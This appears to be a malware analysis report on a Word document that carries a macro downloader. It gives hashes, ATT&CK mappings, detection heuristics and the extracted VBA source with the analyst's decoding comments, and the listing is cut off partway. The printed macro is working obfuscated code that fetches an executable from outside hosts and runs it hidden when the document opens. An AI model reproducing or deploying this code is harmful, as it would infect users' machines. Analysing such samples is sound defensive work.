Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b34e7bc43fb098f1…

MALICIOUS

Office (OLE)

63.4 KB Created: 2018-09-06 21:45:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 0e55369f16f323dd7fdef2a016033584 SHA-1: 4b9619fbe59d979ac9ed1306291e7d4edd9ddf83 SHA-256: b34e7bc43fb098f19a863943221594ca09fc62bba72de128ef6a9f144f22a033
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic · T1204.002 Malicious File · T1566.001 Spearphishing Attachment · T1027 Obfuscated Files or Information (caret escaping, Chr() arithmetic, reversed strings — see decoded macro) · T1059.003 Windows Command Shell (`cmd /V:ON /C`) · T1059.001 PowerShell (decoded fragments use `$env:`, `.DownloadFile`, `Invoke-Item`) · T1105 Ingress Tool Transfer

The sample is a Word document carrying a VBA macro (document module PMUszjjZEuik plus a helper module iMijNRs). Its Document_Open handler calls Shell() with vbHide on a command line that is assembled at runtime from string fragments returned by seven helper functions, so no single literal in the VBA looks like a command. The fragments visible in the extracted module (function znTRd) decode to `cmd /V:ON /C "set 1ND=…"` followed by caret-escaped PowerShell written back-to-front; read in order it iterates an '@'-separated list of URLs, calls DownloadFile() on each into `%PUBLIC%\359.exe`, runs that file with Invoke-Item and breaks out of the loop on the first success — a classic second-stage downloader. Two download locations are recoverable from the visible fragments (defanged): hxxp://maricz-art[.]cba[.]pl/S7Fd and …//dogtrainingbytiffany[.]com/j8PaUMKC (its scheme sits in the truncated part of the listing); further URLs are built by JWrcGHCDcA, which is cut off in this preview. The ClamAV signature Doc.Downloader.URSNIF-6729855-3 is consistent with this loader pattern, but a signature name alone does not establish which family the second stage belongs to — that requires the downloaded payload.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() is invoked from Document_Open with vbHide (no visible window) on a command line built at runtime by string concatenation — see the extracted macro for the decoded command.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Auto-executing Document_Open handler: the payload runs as soon as the document is opened with macros enabled, with no further user interaction.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard DrawingML XML namespace found in ordinary Office content and is not an indicator. The actual download URLs are not listed here because they exist only as caret-split, reversed fragments inside the macro; see the decoded values in the extracted script below.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5498 bytes
SHA-256: fc89da7781b8a980cb2610d061a197d8cdae28769931df48e3d1732c626a0dcf
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "PMUszjjZEuik"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: auto-run entry point of the malicious document. Word calls
' Document_Open as soon as the file is opened with macros enabled, so no
' further user action is needed. Its only job is to assemble and run one
' command line; the command is split across seven helper functions
' (GJzKbfTc, MjBDwbiWJR, cKIpoSvEFLuBU, znTRd, JWrcGHCDcA, BIrZANhUiIbLSj,
' QzQjpBmqAhGPAo) so that no single string literal in the VBA looks like a
' command. Only znTRd (complete) and JWrcGHCDcA (truncated) are visible in
' this preview; what the other five return is not shown — confirm against
' the full extraction.
Private Sub Document_open()
' Every runtime error is silently swallowed from here on, which also keeps
' any failure from surfacing as a dialog to the victim or analyst.
On _
Error _
Resume _
Next
' Shell() executes the concatenated string as an external command with the
' window hidden (vbHide). From the decoded znTRd fragment the command begins
' with cmd /V:ON/C"set 1ND=... — cmd.exe with delayed variable expansion — so
' the real payload runs in cmd/PowerShell, outside the Office process.
' Format(GJzKbfTc) coerces that helper's return value to a string; the
' helper itself is not in the visible listing.
Shell Format(GJzKbfTc) + MjBDwbiWJR + cKIpoSvEFLuBU + znTRd + JWrcGHCDcA + BIrZANhUiIbLSj + QzQjpBmqAhGPAo, vbHide
End Sub



Attribute VB_Name = "iMijNRs"
' Analyst note: returns one slice of the command line that Document_open
' passes to Shell(). Two obfuscation layers are visible in every literal:
'   1. cmd.exe caret escaping — cmd drops a '^' before a character, so
'      "^se^t" is "set" and "/V^:^ON" is "/V:ON" (delayed expansion on).
'   2. Everything after "set 1ND=" is written back-to-front. Reading each
'      fragment right-to-left with carets removed yields PowerShell, e.g.
'      "}}{hc^t^ac}" -> "}catch{}}" and ";^kaerb;^mT^w^$" -> "$wTm;break;".
'      The step that un-reverses %1ND% (presumably a cmd for-loop) is not in
'      the visible portion of the macro — confirm against the truncated code.
' Chr() calls hide single characters behind arithmetic:
'   Chr(3+16+16+11+53) = Chr(99) = "c", Chr(2+11+11+7+36) = Chr(67) = "C",
'   Chr(0+5+5+3+21) = Chr(34) = '"'.
' The interleaved Month "..." statements are junk: Month() expects a date,
' the random strings are not one, and the resulting error is swallowed by
' the On Error Resume Next above. They contribute nothing to the result.
Function znTRd()

On _
Error _
Resume _
Next
Month "if" + "284030241"
   Month "p" + "jQpNIjM" + "Xsb" + "T"
   Month "1921" + "paWZijD"
' Decodes (carets removed) to: cmd /V:ON/C"set 1ND  — the forward-order
' prefix that launches cmd.exe; the "=" completing the set comes next.
aSNZojawqFi = Chr(3 + 16 + 16 + 11 + 53) + "md " + "/V^:^ON" + "/" + Chr(2 + 11 + 11 + 7 + 36) + Chr(0 + 5 + 5 + 3 + 21) + "^" + "se^t " + "^1N^D"
Month "373192534" + "a"
   Month "MYvH" + "D"
   Month "dhdPlXRLlGDO" + "1561"
   Month "zncUmHosEAi" + "Cf" + "pFi" + "Vi"
' "=" then caret/space padding, then "}}{hctac}" which reversed is
' "}catch{}}" — the closing of the try/catch, i.e. the script's last bytes.
PpUarmR = "=^" + "  " + "^ ^  " + " ^ ^   " + "^ ^  " + "^" + " ^   " + "^}}{" + "h" + Chr(3 + 16 + 16 + 11 + 53) + "^t^a" + Chr(3 + 16 + 16 + 11 + 53) + "}"
Month "488827858" + "u"
   Month "TQJbCSTuGT" + "NlbzaWOHUwMfnu"
   Month "q" + "JYvsvRKLJ"
   Month "86567593" + "N" + "mnJCkcd" + "aVl"
   Month "73532472" + "AVwOFJYQwrzdp"
   Month "jbs" + "GvnpwQdOhPlHk"
' Reversed: "$wTm);Invoke-Item $wTm;break;" — executes the downloaded file
' at $wTm and leaves the URL loop after the first success.
JbvollFzfHq = ";^kae" + "rb;^m" + "T^w^$" + "^" + " " + "m" + "et^I-" + "e^ko" + "vnI;" + ")^m" + "Tw^$"
Month "49579110" + "Lczw"
   Month "8303" + "wBRrjfKOc" + "8890" + "K"
   Month "V" + "KnPMUinV" + "7679" + "8887"
   Month "2073" + "353692349"
' Reversed: "Qi.DownloadFile($uBR, " — a DownloadFile(url, path) call on an
' object whose name completes as $PQi with the trailing "$P" of SEcJFJY
' below; where $PQi is created (likely a WebClient) is not visible here.
isibIW = "^ ,R" + "^Bu^$(^" + "el" + "iFd^" + "a" + "^o" + "^ln^woD" + "^.^i^Q"
Month "jRD" + "vAD"
   Month "fKARtCbQnApiLt" + "8373"
   Month "Qkp" + "jzNajoMjrYjd"
' Reversed: "xe';foreach($uBR in $LuS){try{$P" — end of the '.exe' literal,
' then the loop over the URL list $LuS with a try block around each attempt.
SEcJFJY = "P^$^{^y" + "r^t{)^S" + "u^L$ " + "n^i" + " R^Bu$" + "(" + "h" + Chr(3 + 16 + 16 + 11 + 53) + "^aerof" + "^;^'ex^"
Month "2117" + "265067882" + "301828824" + "6514"
   Month "110875160" + "7521" + "fOQLBt" + "ZzuUXSM"
   Month "8784" + "Oi" + "fza" + "Fpr"
' Reversed: "m=$env:public+'\'+$Pmw+'.e" — with "$wT" from uCMvwEqdM this is
' the drop path $wTm = $env:public + '\' + $Pmw + '.exe' (%PUBLIC%\359.exe).
QPMkmMFAh = "e." + "'" + "+w^m^P^" + "$^+" + "'\" + "^'^+" + Chr(3 + 16 + 16 + 11 + 53) + "il" + "b^" + "u^p:v" + "ne$^=m"
Month "MJHHE" + "3052" + "7333" + "CUd"
   Month "205593295" + "coapTpR" + "sTOqnH" + "FhKVJUHInk"
' Reversed: "/S7Fd'.Split('@');$Pmw = '359';$wT" — closes the URL-list
' literal, splits it on '@' (presumably into $LuS, which the foreach
' iterates) and sets the file-name stem '359'.
uCMvwEqdM = "^Tw^$^" + ";^'9^" + "53^'" + "^ =^ w^" + "mP$;" + ")" + "^'" + "@" + "^'(til" + "pS" + ".^'" + "^d^" + "F7^S/"
Month "acw" + "48211091"
   Month "iCIzrlAatWzz" + "UzUjVJ"
' Reversed: "tp://maricz-art.cba.pl" — with "ht" from ClVtSIvOD and "/S7Fd"
' from uCMvwEqdM, the last download URL: hxxp://maricz-art[.]cba[.]pl/S7Fd
' (IOC, defanged).
dkJcA = "l^p.a^b" + Chr(3 + 16 + 16 + 11 + 53) + "^.tr^" + "a-^z" + Chr(3 + 16 + 16 + 11 + 53) + "^" + "i" + "r" + "^" + "a^m" + "//^:pt" + "^"
Month "3150" + "VfnF" + "1387" + "ZC"
' Reversed: "ffany.com/j8PaUMKC@ht" — tail of the previous URL plus the '@'
' separator and the "ht" of the next one.
ClVtSIvOD = "t" + "h" + "@" + Chr(2 + 11 + 11 + 7 + 36) + "KMU^" + "a^" + "P^8" + "j/mo" + Chr(3 + 16 + 16 + 11 + 53) + "^" + ".^" + "y" + "n" + "^af^f^"
Month "2556" + "izIFbFp" + "Uj" + "445967031"
   Month "LpQsQuu" + "mb" + "163603569" + "7465"
' Reversed: "//dogtrainingbyti" — joined with ClVtSIvOD this gives
' //dogtrainingbytiffany[.]com/j8PaUMKC (IOC, defanged); its "http:" scheme
' would come from JWrcGHCDcA, which is truncated in this preview.
wnJZwKLU = "i^" + "t^y" + "bg" + "n^i" + "n^i^art" + "g^o" + "^d//" + "^"
' Fragments are concatenated in on-disk order; the reversed PowerShell is
' read from wnJZwKLU back to PpUarmR.
znTRd = aSNZojawqFi + PpUarmR + JbvollFzfHq + isibIW + SEcJFJY + QPMkmMFAh + uCMvwEqdM + dkJcA + ClVtSIvOD + wnJZwKLU
   Month "YwtCttLmf" + "4779" + "WvjWBTb" + "n"
   Month "cLm" + "bXoFZT" + "7546" + "Muta"
   Month "nwq" + "UwoNIIKIkC"
End Function
Function JWrcGHCDcA()

On _
Error _
Resume _
Next
Month "INwS" + "499807265" + "PiwoQf" + "Wu"
   Month "510163247" + "rum"
JhSdqIba = ":^pt^t" + "^h^" + "@^P" + Chr(3 + 16 + 16 + 11 + 53) + "^2" + "6G/^l" + "p^.a" + "^b" + Chr(3 + 16 + 16 + 11 + 53) + "^" + "." + "sn" + "art^" + "h" + Chr(3 + 16 + 16 + 11 + 53) + "^o^k//:" + "^p"
Month "2393" + "280078838"
   Month "5078" + "bsjmHqhiOi" + "bqjEaav" + "i"
   Month "Q" + "zGm"
Ipajjq = "t^" + "t^h@P^p" + "^9kl^Q" + "^3/^" + "mo" + Chr(3 + 16 + 16 + 11 + 53) + "^." + "e^s" + "^ir^p" + "retn^e" + "^i^s^d" + "//^:" + "^"
Month "DAZQ" + "rvVk" + "cQmA" + "113283547"
   Month "279096717" + "336721570" + "3998" + "Tt"
   Month "FmjIoPF" + "B"
sOiRLAtLbVv = "pt^" + "th@B" + "y/^" + "s^la^" + "tn^e" + "r^." + "m" + "^od//" + "^:p^"
Month "VG" + "h" + "uwo" + "387113719"
   Month "TTsE" + "XFC" + "5006" + "YuZhYXpQcVt"
AsijUL = "t^t" + "^" + "h
... (truncated)